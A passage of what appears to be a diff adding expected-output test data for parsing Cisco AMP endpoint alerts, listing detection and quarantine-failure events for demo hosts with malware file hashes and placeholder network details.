"Auto.BAC7BC5281.in10.tht.Talos", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6411538569722068994", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "file": { + "name": "MspthrdHash.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "hash": { + "sha1": "99fffe78e0cbd7b508eed13a8633903dd89ed5f1", + "sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "md5": "dc41e47ebba549ec5e616ed9e88a0376" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "dc41e47ebba549ec5e616ed9e88a0376", + "99fffe78e0cbd7b508eed13a8633903dd89ed5f1" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:29.843709643Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective 
Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"99fffe78e0cbd7b508eed13a8633903dd89ed5f1\",\"md5\":\"dc41e47ebba549ec5e616ed9e88a0376\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6411538569722069000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "Auto.BAC7BC5281.in10.tht.Talos", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6411538569722068993", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + 
}, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843711565Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419275399255032000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + 
"connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6419275399255031906", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843713424Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete 
pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419275399255032000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419275399255031905", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843715300Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419275399255032000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": 
"6419275399255031904", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843717182Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete 
pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419275399255032000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419275394960064606", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843719050Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419275399255032000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419275394960064605", + 
"event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843721187Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": 
"alert", + "action": "Quarantine Failure", + "id": "6419275399255032000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419275394960064607", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843723102Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419275399255032000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419275394960064604", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + 
"10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843725006Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419275399255032000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + 
"mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419275394960064603", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843726903Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete 
pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419275399255032000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419275394960064602", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843728796Z", + "original": 
